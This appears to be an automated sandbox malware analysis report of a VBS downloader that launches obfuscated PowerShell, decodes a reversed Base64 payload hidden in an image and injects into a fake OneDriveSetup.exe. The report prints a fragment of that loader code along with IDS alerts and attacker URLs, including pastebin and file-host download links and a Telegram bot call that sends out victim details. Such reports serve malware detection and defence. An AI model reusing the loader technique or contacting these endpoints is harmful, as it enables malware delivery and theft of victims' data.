[System.Text.Encoding]::UTF8.GetString(EIHi'+'mageBytes);EIHstartFlag = zNq<<BASE64_START'+'>>zNq;EIH'+'endFlag = zNq<<BASE64_END>>zNq;EIHst'+'art'+'Index = EIHimageText.IndexOf'+'(EIHstartFlag);EIHen'+'dIndex = EIHimageText.Inde'+'xO'+'f(EIHen'+'dFlag);EIHstartIndex -ge 0 -and EIHendIndex -gt EIHstartIndex;EIHstartIndex += EIHstartFlag.Length;EIHbase64Length = EIHendIndex - EIHstartIndex;EIHbase64Com'+'mand = EIHimageText.Substring('+'EIHstartIndex, EIHbase'+'64Length);EIHbase64Reversed = '+'-join (EIHbase64Command.ToCharArray() OTF ForEach-Object { EIH_ })[-1..-'+'(EIHbase64Command.Length)];E'+'IHcommandBytes = [System.Convert]::FromBase64String(EIH'+'base'+'64Reversed);EIHloade

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T09:32:50.785311+010020283713Unknown Traffic192.168.2.849706104.21.84.67443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T09:32:42.115660+010020576351A Network Trojan was detected5.182.211.14980192.168.2.849711TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T09:33:01.135577+010020490381A Network Trojan was detected193.30.119.205443192.168.2.849707TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T09:33:25.683925+010028033053Unknown Traffic192.168.2.849714172.67.177.134443TCP
                  2024-11-26T09:33:41.335289+010028033053Unknown Traffic192.168.2.849724172.67.177.134443TCP
                  2024-11-26T09:33:47.793673+010028033053Unknown Traffic192.168.2.849728172.67.177.134443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T09:33:21.237828+010028032742Potentially Bad Traffic192.168.2.849712193.122.6.16880TCP
                  2024-11-26T09:33:24.003462+010028032742Potentially Bad Traffic192.168.2.849712193.122.6.16880TCP
                  2024-11-26T09:33:27.222225+010028032742Potentially Bad Traffic192.168.2.849715193.122.6.16880TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T09:32:42.115660+010028582951A Network Trojan was detected5.182.211.14980192.168.2.849711TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://sbv.pushswroller.eu/gfy/gesr.txtAvira URL Cloud: Label: malware
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

                  barindex
                  Tries to detect the country of the analysis system (by using the IP)
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.8:49713 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.8:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 193.30.119.205:443 -> 192.168.2.8:49707 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49730 version: TLS 1.2
                  Source: Binary string: _.pdb source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmp

                  Spreading

                  barindex
                  Yara detected VBS Downloader Generic
                  Source: Yara matchFile source: Doc261124.vbs, type: SAMPLE

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41DC84h6_2_0C41D9D8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C413206h6_2_0C412DE8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C412834h6_2_0C412580
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41E0DCh6_2_0C41DE30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C410D0Fh6_2_0C410B30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C411699h6_2_0C410B30
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0C410040
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41FAECh6_2_0C41F840
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0C410856
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41CF7Ch6_2_0C41CCD0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41D3D4h6_2_0C41D128
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C413206h6_2_0C413134
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C413206h6_2_0C412DDA
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41D82Ch6_2_0C41D580
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h6_2_0C410676
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41E98Ch6_2_0C41E6E0
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41E534h6_2_0C41E288
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41EDE4h6_2_0C41EB38
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41F694h6_2_0C41F3E8
                  Source: C:\Windows\SysWOW64\OneDriveSetup.exeCode function: 4x nop then jmp 0C41F23Ch6_2_0C41EF90

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 5.182.211.149:80 -> 192.168.2.8:49711
                  Source: Network trafficSuricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 5.182.211.149:80 -> 192.168.2.8:49711
                  Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 193.30.119.205:443 -> 192.168.2.8:49707
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: paste.ee
                  Uses the Telegram API (likely for C&C communication)
                  Source: unknownDNS query: name: api.telegram.org
                  Yara detected Generic Downloader
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.aff0000.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86f090e.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00f20.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.3.OneDriveSetup.exe.6951b38.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.86ef9ee.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.OneDriveSetup.exe.8b00000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2027/11/2024%20/%2008:13:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /gfy/gesr.txt HTTP/1.1Host: sbv.pushswroller.euConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /swsk/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: sws.swpushroller.euContent-Length: 1432Connection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 104.21.84.67:443
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49712 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49715 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49724 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49728 -> 172.67.177.134:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49714 -> 172.67.177.134:443
                  Source: global trafficHTTP traffic detected: GET /d/MQJcS HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /d/MQJcS HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.8:49713 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /d/MQJcS HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c HTTP/1.1Host: 3105.filemail.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.75 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20and%20Time:%2027/11/2024%20/%2008:13:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20818225%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /d/MQJcS HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-CHUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
                  Source: global trafficHTTP traffic detected: GET /gfy/gesr.txt HTTP/1.1Host: sbv.pushswroller.euConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: paste.ee
                  Source: global trafficDNS traffic detected: DNS query: 3105.filemail.com
                  Source: global trafficDNS traffic detected: DNS query: sbv.pushswroller.eu
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: sws.swpushroller.eu
                  Source: unknownHTTP traffic detected: POST /swsk/P4.php HTTP/1.1Content-Type: text/plain; charset=utf-8Host: sws.swpushroller.euContent-Length: 1432Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Tue, 26 Nov 2024 08:33:49 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: wscript.exe, 00000000.00000003.1460347182.000002BB95151000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1463456856.000002BB93885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/MQJcS
                  Source: wscript.exe, 00000000.00000003.1462205544.000002BB956B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/MQJcSW
                  Source: wscript.exe, 00000000.00000002.1463009577.000002BB936B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1461792531.000002BB936B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://paste.ee/d/MQJcS_
                  Source: powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000002.00000002.1993680537.000002380385E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sws.swpushroller.eu
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sws.swpushroller.eu/swsk/P4.php
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sws.swpushroller.eu/swsk/api.php
                  Source: OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008B61000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com
                  Source: powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/
                  Source: powershell.exe, 00000004.00000002.1721289665.000001D2949A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: powershell.exe, 00000002.00000002.1993680537.000002380380F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000002.00000002.1993680537.000002380382A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1721289665.000001D294781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                  Source: wscript.exe, 00000000.00000003.1458710571.000002BB9375A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000003.1720983716.0000000006951000.00000004.00000020.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2698687625.000000000AFF0000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2695247257.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2694906532.00000000086AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: OneDriveSetup.exe, 00000006.00000002.2695309823.0000000008C47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:818225%0D%0ADate%20a
                  Source: OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009BE3000.00000004.00000800.00020000.00000000.sdmp, OneDriveSetup.exe, 00000006.00000002.2696739515.0000000009E2D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
